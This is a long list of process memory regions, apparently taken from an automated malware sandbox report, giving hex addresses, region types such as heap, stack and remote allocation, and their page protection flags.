25454884000
heap
page read and write
1FCB4DA0000
heap
page read and write
9550000
trusted library allocation
page read and write
2545482E000
heap
page read and write
6791000
heap
page read and write
20BF3932000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6890000
trusted library allocation
page read and write
28A2AC60000
trusted library allocation
page read and write
D16000
heap
page read and write
E51000
heap
page read and write
26B2B530000
heap
page read and write
2560000
heap
page read and write
8E90000
trusted library allocation
page read and write
20BF3013000
heap
page read and write
6791000
heap
page read and write
2ECE000
stack
page read and write
708E000
stack
page read and write
17BFE663000
heap
page read and write
1FCB4453000
heap
page read and write
1FCB4D6E000
heap
page read and write
6791000
heap
page read and write
68A5000
trusted library allocation
page read and write
21BE448E000
heap
page read and write
158FD402000
trusted library allocation
page read and write
B20000
unkown
page readonly
158FCBA0000
trusted library allocation
page read and write
6791000
heap
page read and write
6DDD000
stack
page read and write
8E90000
trusted library allocation
page read and write
2BB7000
heap
page read and write
2F0F000
stack
page read and write
D26000
heap
page read and write
8E90000
trusted library allocation
page read and write
41E000
remote allocation
page readonly
1FCB4D86000
heap
page read and write
28532097000
heap
page read and write
28537490000
trusted library allocation
page read and write
30000
heap
page read and write
6791000
heap
page read and write
25454849000
heap
page read and write
6791000
heap
page read and write
9580000
trusted library allocation
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D96000
heap
page read and write
6791000
heap
page read and write
28532959000
heap
page read and write
68A0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
28532913000
heap
page read and write
6791000
heap
page read and write
8E9A000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB4D6B000
heap
page read and write
8E95000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
25454800000
heap
page read and write
23B75102000
heap
page read and write
158FCC58000
heap
page read and write
508000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D87000
heap
page read and write
C34000
heap
page read and write
2B80000
heap
page read and write
58CC47E000
stack
page read and write
8E95000
trusted library allocation
page read and write
6791000
heap
page read and write
285320A3000
heap
page read and write
6791000
heap
page read and write
934047E000
stack
page read and write
17BFE657000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
2853208C000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
1A375630000
heap
page read and write
1FCB4471000
heap
page read and write
28A29DD5000
heap
page read and write
25454830000
heap
page read and write
1FCB4D95000
heap
page read and write
207BAC85000
heap
page read and write
B40000
unkown
page read and write
1FCB4456000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
D22000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB4D85000
heap
page read and write
6791000
heap
page read and write
2545483D000
heap
page read and write
9A9C000
trusted library allocation
page read and write
25454848000
heap
page read and write
688D000
stack
page read and write
6E0397E000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
C89A87B000
stack
page read and write
1FCB4C02000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1A375836000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB445C000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E97000
trusted library allocation
page read and write
F26000
heap
page read and write
6791000
heap
page read and write
2990000
remote allocation
page read and write
23B7502A000
heap
page read and write
1FCB4D68000
heap
page read and write
6791000
heap
page read and write
28532114000
heap
page read and write
8FB6000
trusted library allocation
page read and write
1A376002000
trusted library allocation
page read and write
26C0000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D9C000
heap
page read and write
6791000
heap
page read and write
28537530000
trusted library allocation
page read and write
9560000
trusted library allocation
page execute and read and write
C34000
heap
page read and write
8E96000
trusted library allocation
page read and write
9931000
trusted library allocation
page read and write
1FCB4DAD000
heap
page read and write
1FCB5262000
heap
page read and write
1A375840000
heap
page read and write
68A0000
trusted library allocation
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
7590000
remote allocation
page read and write
3080000
heap
page read and write
6791000
heap
page read and write
275F000
stack
page read and write
158FCD13000
heap
page read and write
704D000
stack
page read and write
28A29E51000
heap
page read and write
8E95000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
158FCC61000
heap
page read and write
285327F3000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
C89AAFF000
stack
page read and write
207BA9EE000
heap
page read and write
1FCB445A000
heap
page read and write
C34000
heap
page read and write
1FCB4D9C000
heap
page read and write
28532815000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
7A01000
trusted library allocation
page read and write
6791000
heap
page read and write
68A0000
trusted library allocation
page read and write
6791000
heap
page read and write
23B75100000
heap
page read and write
1FCB4D65000
heap
page read and write
689B000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
285376BB000
heap
page read and write
435000
unkown
page read and write
C89A3BE000
stack
page read and write
8E99000
trusted library allocation
page read and write
6791000
heap
page read and write
28537560000
trusted library allocation
page read and write
C34000
heap
page read and write
6791000
heap
page read and write
25454863000
heap
page read and write
2210000
heap
page read and write
7590000
remote allocation
page read and write
6895000
trusted library allocation
page read and write
91CE000
stack
page read and write
CAE9AF9000
stack
page read and write
8E90000
trusted library allocation
page read and write
158FCC00000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1FCB4D9C000
heap
page read and write
1FCB44FC000
heap
page read and write
DEE000
stack
page read and write
4FC9D7F000
stack
page read and write
DD3000
heap
page read and write
8E90000
trusted library allocation
page read and write
28531F50000
heap
page read and write
6BE000
stack
page read and write
21BE4502000
heap
page read and write
285376F9000
heap
page read and write
8E90000
trusted library allocation
page read and write
745D000
stack
page read and write
9570000
trusted library allocation
page read and write
1FCB4D9C000
heap
page read and write
9940000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
68A0000
trusted library allocation
page read and write
28537500000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
28532918000
heap
page read and write
6AA000
stack
page read and write
6890000
trusted library allocation
page read and write
68A5000
trusted library allocation
page read and write
23B75059000
heap
page read and write
26B2B668000
heap
page read and write
285320FE000
heap
page read and write
6791000
heap
page read and write
408000
unkown
page readonly
1FCB5202000
heap
page read and write
6791000
heap
page read and write
28537980000
remote allocation
page read and write
740F000
stack
page read and write
9EE000
stack
page read and write
6791000
heap
page read and write
57C558E000
stack
page read and write
8E90000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
6791000
heap
page read and write
8E9C000
trusted library allocation
page read and write
6791000
heap
page read and write
8E96000
trusted library allocation
page read and write
E68000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
730E000
stack
page read and write
1FCB4516000
heap
page read and write
640000
heap
page read and write
9F0000
unkown
page readonly
6791000
heap
page read and write
F1A000
trusted library allocation
page execute and read and write
6A8A000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
C34000
heap
page read and write
21BE4426000
heap
page read and write
26B2B613000
heap
page read and write
20BF2FA0000
heap
page read and write
6C12000
trusted library allocation
page read and write
6791000
heap
page read and write
6DAFC7C000
stack
page read and write
17BFE4E0000
heap
page read and write
119E000
stack
page read and write
8E90000
trusted library allocation
page read and write
26B2B663000
heap
page read and write
8EA0000
trusted library allocation
page read and write
23B75050000
heap
page read and write
E11000
heap
page read and write
6C73000
trusted library allocation
page read and write
158FCC5C000
heap
page read and write
1FCB4D83000
heap
page read and write
1FCB4D97000
heap
page read and write
68A0000
trusted library allocation
page read and write
28531FF0000
trusted library allocation
page read and write
21BE4C02000
trusted library allocation
page read and write
400000
unkown
page readonly
6791000
heap
page read and write
1A375902000
heap
page read and write
1FCB4D87000
heap
page read and write
1150000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
28A2AA20000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
68D78FC000
stack
page read and write
8E90000
trusted library allocation
page read and write
43C000
unkown
page readonly
207BA9E2000
heap
page read and write
28537510000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
158FCC3C000
heap
page read and write
1FCB5202000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
23B75013000
heap
page read and write
C34000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1FCB4502000
heap
page read and write
1FCB4D63000
heap
page read and write
6791000
heap
page read and write
58CC5FC000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
25454829000
heap
page read and write
8E98000
trusted library allocation
page read and write
6791000
heap
page read and write
321000
unkown
page execute read
158FCD00000
heap
page read and write
8E90000
trusted library allocation
page read and write
285320B5000
heap
page read and write
1FCB4D96000
heap
page read and write
158FCC64000
heap
page read and write
17BFE675000
heap
page read and write
2853203E000
heap
page read and write
1FCB4D83000
heap
page read and write
28A29E90000
heap
page read and write
1FCB4D63000
heap
page read and write
400000
unkown
page readonly
21BE4508000
heap
page read and write
6890000
trusted library allocation
page read and write
21BE446E000
heap
page read and write
57C5AFF000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
285320B0000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6DAFBFF000
stack
page read and write
8E90000
trusted library allocation
page read and write
6896000
trusted library allocation
page read and write
26B2B602000
heap
page read and write
C0A087F000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
B30000
heap
page read and write
6791000
heap
page read and write
23B74F20000
heap
page read and write
20BF306E000
heap
page read and write
8E90000
trusted library allocation
page read and write
DC5000
heap
page read and write
EA4000
heap
page read and write
58CC7FD000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
1A3756A0000
heap
page read and write
29E0000
heap
page read and write
6791000
heap
page read and write
28537980000
remote allocation
page read and write
6791000
heap
page read and write
1FCB44AE000
heap
page read and write
FABB18B000
stack
page read and write
2545480B000
heap
page read and write
90CC000
stack
page read and write
BC0000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
28A29E90000
heap
page read and write
6791000
heap
page read and write
68A0000
trusted library allocation
page read and write
4FC9EFE000
stack
page read and write
8E90000
trusted library allocation
page read and write
28A29EAC000
heap
page read and write
6791000
heap
page read and write
28537910000
trusted library allocation
page read and write
6791000
heap
page read and write
158FCC29000
heap
page read and write
8E90000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
68A5000
trusted library allocation
page read and write
6791000
heap
page read and write
25454650000
heap
page read and write
1A375813000
heap
page read and write
93406F9000
stack
page read and write
1FCB4D6E000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
905000
unkown
page readonly
DC0000
heap
page read and write
25454864000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1FCB4D7C000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB4D81000
heap
page read and write
EFD000
trusted library allocation
page execute and read and write
28532FE0000
trusted library allocation
page read and write
6791000
heap
page read and write
438000
unkown
page readonly
207BA9CD000
heap
page read and write
1FCB4D78000
heap
page read and write
17BFE66A000
heap
page read and write
158FCB10000
heap
page read and write
6791000
heap
page read and write
20BF30C9000
heap
page read and write
207BAAC0000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
6890000
trusted library allocation
page read and write
20BF3102000
heap
page read and write
6791000
heap
page read and write
25454867000
heap
page read and write
4C8000
remote allocation
page readonly
8E40000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
DF0000
heap
page read and write
68A0000
trusted library allocation
page read and write
8E96000
trusted library allocation
page read and write
1FCB44B3000
heap
page read and write
6791000
heap
page read and write
1FCB4DBD000
heap
page read and write
1FCB4D6F000
heap
page read and write
401000
unkown
page execute read
321000
unkown
page execute read
C34000
heap
page read and write
6791000
heap
page read and write
21BE4429000
heap
page read and write
E4D000
heap
page read and write
927000
unkown
page execute read
1FCB4D85000
heap
page read and write
6791000
heap
page read and write
7A7000
stack
page read and write
6791000
heap
page read and write
9934000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
B40000
unkown
page write copy
650000
heap
page read and write
207BAA01000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
2853762E000
heap
page read and write
207BA9F0000
heap
page read and write
FF050000
trusted library allocation
page execute and read and write
6A74000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
E3D000
heap
page read and write
17BFE67B000
heap
page read and write
1FCB4D9C000
heap
page read and write
20BF3029000
heap
page read and write
68B0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
FABB779000
stack
page read and write
6791000
heap
page read and write
28537520000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
6E03B7E000
stack
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
68D7BFF000
stack
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D9D000
heap
page read and write
E3D000
heap
page read and write
6791000
heap
page read and write
1FCB4D9C000
heap
page read and write
1FCB4D6F000
heap
page read and write
6E03D7E000
stack
page read and write
BAE000
stack
page read and write
2D98000
heap
page read and write
1FCB4D67000
heap
page read and write
1FCB4D63000
heap
page read and write
285320AC000
heap
page read and write
25454845000
heap
page read and write
1FCB4458000
heap
page read and write
6791000
heap
page read and write
28532093000
heap
page read and write
6791000
heap
page read and write
23B7503C000
heap
page read and write
25454861000
heap
page read and write
1FCB4D9D000
heap
page read and write
1FCB4D9C000
heap
page read and write
6791000
heap
page read and write
1FCB5221000
heap
page read and write
5F6A07F000
stack
page read and write
6791000
heap
page read and write
1FCB4DC0000
heap
page read and write
E38000
heap
page read and write
23B75055000
heap
page read and write
17BFE713000
heap
page read and write
8EA0000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB4D83000
heap
page read and write
23B7504B000
heap
page read and write
1FCB4D83000
heap
page read and write
57C5CFD000
stack
page read and write
285376A5000
heap
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
2990000
remote allocation
page read and write
6791000
heap
page read and write
5F6A37F000
stack
page read and write
6791000
heap
page read and write
1FCB4D83000
heap
page read and write
CAE9CFE000
stack
page read and write
8E95000
trusted library allocation
page read and write
58CC4FB000
stack
page read and write
6791000
heap
page read and write
400000
remote allocation
page readonly
E68000
heap
page read and write
F00000
trusted library allocation
page read and write
6791000
heap
page read and write
28532077000
heap
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
C34000
heap
page read and write
6791000
heap
page read and write
21BE4350000
heap
page read and write
8EA0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
28532071000
heap
page read and write
28531F60000
heap
page read and write
28A29E48000
heap
page read and write
28532904000
heap
page read and write
285327F0000
trusted library allocation
page read and write
58CC6FE000
stack
page read and write
CDF000
stack
page read and write
9550000
trusted library allocation
page read and write
6791000
heap
page read and write
68A5000
trusted library allocation
page read and write
6890000
trusted library allocation
page read and write
28A29DD0000
heap
page read and write
68A0000
trusted library allocation
page read and write
68A7000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
E27000
heap
page read and write
28537930000
trusted library allocation
page read and write
28532091000
heap
page read and write
6791000
heap
page read and write
28532029000
heap
page read and write
207BA9D6000
heap
page read and write
23B75077000
heap
page read and write
1FCB4BE0000
remote allocation
page read and write
1FCB4D78000
heap
page read and write
68D75CE000
stack
page read and write
68A5000
trusted library allocation
page read and write
28537480000
trusted library allocation
page read and write
11A0000
trusted library allocation
page readonly
68A0000
trusted library allocation
page read and write
1FCB4DAD000
heap
page read and write
1FCB5219000
heap
page read and write
6BD1000
trusted library allocation
page read and write
1FCB4D8D000
heap
page read and write
C6E000
stack
page read and write
8E97000
trusted library allocation
page read and write
68A8000
trusted library allocation
page read and write
21BE4460000
heap
page read and write
401000
remote allocation
page execute read
17BFE65B000
heap
page read and write
6791000
heap
page read and write
E63000
heap
page read and write
6CC000
stack
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
19A000
stack
page read and write
440000
remote allocation
page readonly
6791000
heap
page read and write
C89A77B000
stack
page read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
25454840000
heap
page read and write
6830000
trusted library allocation
page read and write
28532058000
heap
page read and write
8E96000
trusted library allocation
page read and write
670000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
D76000
heap
page read and write
93405FE000
stack
page read and write
21BE445B000
heap
page read and write
6791000
heap
page read and write
71CD000
stack
page read and write
23B75092000
heap
page read and write
1FCB4D66000
heap
page read and write
6C20000
trusted library allocation
page read and write
6791000
heap
page read and write
26B2B651000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
CAE9177000
stack
page read and write
207BAA04000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
1FCB4D6A000
heap
page read and write
940E000
stack
page read and write
6890000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
6791000
heap
page read and write
25A0000
remote allocation
page read and write
8E90000
trusted library allocation
page read and write
23B75057000
heap
page read and write
6791000
heap
page read and write
75CE000
stack
page read and write
6791000
heap
page read and write
8FB0000
trusted library allocation
page read and write
6791000
heap
page read and write
2545486B000
heap
page read and write
28532102000
heap
page read and write
1FCB4D96000
heap
page read and write
310000
heap
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
8FB0000
trusted library allocation
page read and write
28A29E40000
heap
page read and write
28A2AC80000
trusted library allocation
page read and write
24D0000
heap
page read and write
57C5BF7000
stack
page read and write
68D79FB000
stack
page read and write
CAE8D7B000
stack
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
E63000
heap
page read and write
9F0000
unkown
page readonly
1FCB4D85000
heap
page read and write
B40000
heap
page read and write
6791000
heap
page read and write
23B7504C000
heap
page read and write
8E40000
trusted library allocation
page read and write
6791000
heap
page read and write
20BF30E2000
heap
page read and write
C89A8FE000
stack
page read and write
6791000
heap
page read and write
93401CE000
stack
page read and write
6791000
heap
page read and write
8E95000
trusted library allocation
page read and write
68A5000
trusted library allocation
page read and write
6791000
heap
page read and write
20BF2FD0000
trusted library allocation
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
1A3757D0000
remote allocation
page read and write
8E90000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
1132000
trusted library allocation
page read and write
4FC9DFF000
stack
page read and write
207BA9F0000
heap
page read and write
C34000
heap
page read and write
296B000
stack
page read and write
6791000
heap
page read and write
25454860000
heap
page read and write
6791000
heap
page read and write
42C000
unkown
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
68A0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
207BAA00000
heap
page read and write
8E90000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
93409F8000
stack
page read and write
68F0000
heap
page read and write
DD9000
heap
page read and write
6791000
heap
page read and write
6E03C7F000
stack
page read and write
25454902000
heap
page read and write
6DAFE7D000
stack
page read and write
2545483A000
heap
page read and write
1FCB4D65000
heap
page read and write
294F000
stack
page read and write
6791000
heap
page read and write
207BA9C0000
heap
page read and write
D3F000
stack
page execute and read and write
6791000
heap
page read and write
C34000
heap
page read and write
9560000
trusted library allocation
page read and write
1A375802000
heap
page read and write
26B2B560000
trusted library allocation
page read and write
6890000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8FB0000
trusted library allocation
page read and write
207BA9EE000
heap
page read and write
68A6000
trusted library allocation
page read and write
9917000
trusted library allocation
page read and write
11C0000
trusted library allocation
page execute and read and write
1FCB4454000
heap
page read and write
2853764A000
heap
page read and write
C34000
heap
page read and write
402000
remote allocation
page execute read
FCE000
stack
page read and write
2572000
direct allocation
page execute and read and write
6791000
heap
page read and write
8E90000
trusted library allocation
page read and write
2B78000
direct allocation
page execute and read and write
7590000
remote allocation
page read and write
8E99000
trusted library allocation
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
DE9000
heap
page read and write
68A0000
trusted library allocation
page read and write
6791000
heap
page read and write
8E97000
trusted library allocation
page read and write
2545487D000
heap
page read and write
68A0000
trusted library allocation
page read and write
20BF3802000
heap
page read and write
EF0000
trusted library allocation
page read and write
1FCB4D6E000
heap
page read and write
6791000
heap
page read and write
28A2AC90000
trusted library allocation
page read and write
28532918000
heap
page read and write
6791000
heap
page read and write
68E0000
heap
page read and write
8FB7000
trusted library allocation
page read and write
6791000
heap
page read and write
28532800000
heap
page read and write
6791000
heap
page read and write
1FCB5202000
heap
page read and write
28532102000
heap
page read and write
E1C000
heap
page read and write
6791000
heap
page read and write
1FCB4D69000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8EA0000
trusted library allocation
page read and write
23B74FC0000
trusted library allocation
page read and write
6791000
heap
page read and write
1FCB4D85000
heap
page read and write
76CF000
stack
page read and write
6791000
heap
page read and write
CE0000
trusted library allocation
page read and write
6791000
heap
page read and write
99F000
stack
page read and write
1FCB4400000
heap
page read and write
25454874000
heap
page read and write
6E0387B000
stack
page read and write
1FCB4BE0000
remote allocation
page read and write
6791000
heap
page read and write
8FC0000
heap
page execute and read and write
25454875000
heap
page read and write
1FCB443C000
heap
page read and write
8E90000
trusted library allocation
page read and write
20BF3900000
heap
page read and write
8EA0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
28537614000
heap
page read and write
25454862000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8E7D000
stack
page read and write
17BFE4F0000
heap
page read and write
6791000
heap
page read and write
1A375852000
heap
page read and write
28532000000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
CAE927A000
stack
page read and write
57C550C000
stack
page read and write
285375F0000
trusted library allocation
page read and write
1FCB43C0000
heap
page read and write
21BE43C0000
heap
page read and write
6791000
heap
page read and write
28532053000
heap
page read and write
1FCB44A7000
heap
page read and write
1FCB4D63000
heap
page read and write
207BA9CB000
heap
page read and write
6791000
heap
page read and write
6F0A000
stack
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
58CC1FF000
stack
page read and write
E4D000
heap
page read and write
990000
heap
page read and write
8E40000
trusted library allocation
page read and write
C34000
heap
page read and write
68A6000
trusted library allocation
page read and write
1FCB4D6B000
heap
page read and write
23B7506F000
heap
page read and write
1FCB4D63000
heap
page read and write
68F9000
heap
page read and write
6791000
heap
page read and write
9A80000
trusted library allocation
page read and write
9340AF7000
stack
page read and write
207BA9E5000
heap
page read and write
9A90000
trusted library allocation
page read and write
28537550000
trusted library allocation
page read and write
6791000
heap
page read and write
9960000
trusted library allocation
page read and write
5F69E7D000
stack
page read and write
1A375800000
heap
page read and write
1FCB4350000
heap
page read and write
207BA9D6000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
68A8000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6A01000
trusted library allocation
page read and write
1FCB4D63000
heap
page read and write
E3D000
heap
page read and write
6791000
heap
page read and write
DD8000
heap
page read and write
8E98000
trusted library allocation
page read and write
285376A2000
heap
page read and write
26B2BE02000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6791000
heap
page read and write
2545484E000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB444B000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4452000
heap
page read and write
20BF303E000
heap
page read and write
FD0000
heap
page read and write
6791000
heap
page read and write
68A0000
trusted library allocation
page read and write
21BE446E000
heap
page read and write
6791000
heap
page read and write
1FCB4D6B000
heap
page read and write
17BFE68A000
heap
page read and write
21BE4474000
heap
page read and write
6791000
heap
page read and write
C34000
heap
page read and write
8E90000
trusted library allocation
page read and write
72CC000
stack
page read and write
C0A097F000
stack
page read and write
6791000
heap
page read and write
9928000
trusted library allocation
page read and write
2D90000
heap
page read and write
6791000
heap
page read and write
68D7AF7000
stack
page read and write
68A0000
trusted library allocation
page read and write
C34000
heap
page read and write
6791000
heap
page read and write
1FCB4D7B000
heap
page read and write
207BA9EE000
heap
page read and write
25A0000
remote allocation
page read and write
E04000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
8EA0000
trusted library allocation
page read and write
6791000
heap
page read and write
68A0000
trusted library allocation
page read and write
C34000
heap
page read and write
8FB0000
trusted library allocation
page read and write
6791000
heap
page read and write
DA4000
heap
page read and write
9961000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
285376BC000
heap
page read and write
CF0000
heap
page read and write
23B7504F000
heap
page read and write
23B75108000
heap
page read and write
6791000
heap
page read and write
1FCB4DC3000
heap
page read and write
25454813000
heap
page read and write
68A5000
trusted library allocation
page read and write
207BA990000
heap
page read and write
1FCB5203000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
6791000
heap
page read and write
44B000
remote allocation
page read and write
5F69F7F000
stack
page read and write
8E90000
trusted library allocation
page read and write
930E000
stack
page read and write
158FCB70000
heap
page read and write
8E90000
trusted library allocation
page read and write
20BF3024000
heap
page read and write
6791000
heap
page read and write
1FCB4413000
heap
page read and write
1FCB44F2000
heap
page read and write
6791000
heap
page read and write
28537707000
heap
page read and write
8E90000
trusted library allocation
page read and write
1FCB4D9C000
heap
page read and write
285376E4000
heap
page read and write
6791000
heap
page read and write
8E96000
trusted library allocation
page read and write
28A2AA10000
trusted library allocation
page read and write
B42000
unkown
page execute read
9550000
trusted library allocation
page read and write
6791000
heap
page read and write
25454842000
heap
page read and write
21BE4465000
heap
page read and write
990D000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
26B2B700000
heap
page read and write
8E90000
trusted library allocation
page read and write
68A5000
trusted library allocation
page read and write
992C000
trusted library allocation
page read and write
6791000
heap
page read and write
207BAC80000
heap
page read and write
1FCB5202000
heap
page read and write
28A2AC70000
heap
page readonly
8E90000
trusted library allocation
page read and write
1FCB43F0000
trusted library allocation
page read and write
1A3757D0000
remote allocation
page read and write
17BFE666000
heap
page read and write
26B2B724000
heap
page read and write
9C40000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
6791000
heap
page read and write
40A000
unkown
page read and write
21BE445F000
heap
page read and write
There are 1635 hidden memdumps, click here to show them.